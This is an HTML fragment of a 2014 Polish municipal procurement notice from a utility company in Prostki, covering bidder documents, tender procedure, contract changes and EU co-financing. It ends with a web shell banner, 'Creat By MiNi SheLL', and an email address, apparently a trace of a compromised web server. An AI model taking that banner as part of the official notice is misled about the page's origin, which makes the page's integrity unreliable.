<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust. 1 ustawy, Zamawiający informuje, że przewiduje możliwość zmiany postanowień zawartej umowy w następujących okolicznościach: 
1.1.Zmiana terminu zakończenia zamówienia w przypadku zmiany terminu zakończenia  zamówienia w umowie o dofinansowanie zawartej z Instytucją Pośredniczącą
1.2.w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy; siłę wyższą rozumie się jako zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Zmiana taka może dotyczyć w szczególności przesunięcia terminu realizacji umowy;
1.3.w przypadku ustawowej zmiany obowiązującej stawki podatku VAT, w takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalona będzie każdorazowo na dzień wystawienia faktury (powstania obowiązku podatkowego),
2.Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.prostki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Przedsiębiorstwa Usług Komunalnych Sp. z o.o. , ul. Kolejowa 26, 19-335 Prostki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 10:00, miejsce: Sekretariat Przedsiębiorstwa Usług Komunalnych Sp. z o.o. , ul. Kolejowa 26, 19-335 Prostki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane z Unii Europejskiej ze środków Europejskiego Funduszu Rozwoju Regionalnego na podstawie umowy o dofinansowanie nr UDA-RPWM.06.02.01-28-041/13-00, w ramach działania 6.2: Ochrona środowiska przed zanieczyszczeniami i zniszczeniami. Zamówienie jest realizowane w ramach projektu WND-RPWM.06.02.01-28-041/13.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com